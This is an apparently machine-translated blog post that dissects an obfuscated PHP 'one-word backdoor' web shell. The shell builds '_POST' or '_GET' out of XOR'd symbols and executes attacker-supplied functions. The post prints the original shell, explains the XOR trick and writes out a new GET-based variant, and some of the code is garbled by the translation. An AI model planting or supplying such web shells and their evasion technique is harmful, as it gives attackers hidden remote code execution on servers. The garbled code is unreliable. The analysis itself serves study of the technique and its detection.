A word back door code in detail

The mysterious Word backdoor code content:

<?php @$_++; $__=("#"^"|"); $__.=("." ^"~");$__.=("/"^"`");$__.=("|"  ^"/");$__.=("{"^"/"); ${$__}[!$_](${$__}[$_]);? >

Code function:

The above code is a word back door of PHP, when the post data is 0=assert&1=phpinfo (), then the Assert (' phpinfo () ') will be executed;

The results of sending a POST request under Firefox using the Hackbar plugin are as follows:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/70/E4/wKioL1XAmYGCkGIIAA_9SAhbIPQ124.jpg "title=" 1.png " alt= "Wkiol1xamygckgiiaa_9sahbipq124.jpg"/>

Why do you say he's mysterious? Because it is strange that there is no normal code character in the code, it can receive post data and execute system functions. Next, analyze how he can execute it.

Format the code and print the results:

<?php @$_++;//var_dump ($_); 1 $__= ("#" ^ "|");    /var_dump ($__); _   $__.=("."    ^ "~");//var_dump ($__);    _p $__.= ("/" ^ "'");//var_dump ($__); _po $__.= ("|"    ^ "/");//var_dump ($__);    _pos $__.= ("{" ^ "/");//var_dump ($__); _post ${$__}[!$_] (${$__}[$_]);//i.e. $_post[' 0 '] ($_post[' 1 ');? >

By printing the data we can see that, in fact, the code itself is finally executed $_post[' 0 '] ($_post[' 1 '), and each of the _post characters are made by two symbols of the different or operation after stitching.

So the question comes, why do you get _post after the different or later? This involves the string XOR operation of PHP. First explain what is called XOR or operation. XOR operations are generally called bitwise XOR. The meaning is two binary number, bitwise operation, the same as 0 or 1 result is 0, the result is not the same as 1. For example 10101100 ^ 11010010 = 01111110. The PHP string XOR operation has the following 5 steps altogether:

1. Convert the two strings that need to be made into decimal ASC2 code values; 2. Converts the ASC2 code value to a binary number; 3. Bitwise XOR OR operation of the converted binary; 4. Converts the binary number obtained by XOR to a decimal number; 5. According to the ASC2 code table, Converts a decimal number to a string and returns. At this point, PHP's string xor or operation is complete.

So, you can explain why you end up getting _post strings. For example, the underscore _ is the first to convert # and | To decimal ASC2 code value, 35 and 124 (in PHP can use the ORD function to get the string corresponding to the ASC2 code value), Then the 35 and 124 are turned into binary number 00100011 and 01111100 then bitwise XOR or get 01011111 then turn into decimal is 95, then get by ASC2 Code table get 95 corresponding string for _.

Understand the principle of PHP string XOR operation, then, in fact, I can modify the next door, changed to receive parameters by get.

In order to know which two single-character XOR operation can be obtained by G or E, do the following program, print a list, get any two single character to be different or result

<?phpheader ("Content-type:text/html;charset=utf-8");? ><table width= "50%" border= "0" cellpadding= "2" cellspacing= "0" ><tr><td> xor value A</TD><TD > XOR value b</td><td> xor result </td></tr><?php for ($i =0; $i <=127; $i + +) {$array [] = Chr ($i);}? & gt;<?php for ($i =0; $i <=127; $i + +) {><?php $a = array_shift ($array);? ><?php foreach ($array as $v) { ? ><tr><td><?php echo $a;? ></td><td><?php echo $v;?></td><td> <?php echo $a ^ $v; ></td></tr><?php}? ><?php}?></table>

By the list above can be found that g can be obtained by ' ^ ', e can be obtained by 8 ^}, so the following program can also be used as a word back door, and parameters are passed by get:

<?php//get mode receive parameter @$_++;$__= ("#" ^ "|"); /_$__.= ("'" ^ "'");//g$__.= ("8" ^ "}");//e$__.= ("{" ^ "/");//t${$__}[!$_] (${$__}[$_]);? >

At this point, the mystery of a word back door detailed finished.

This article is from the "Junstar" blog, make sure to keep this source http://junstar.blog.51cto.com/4551565/1681688

A word back door code in detail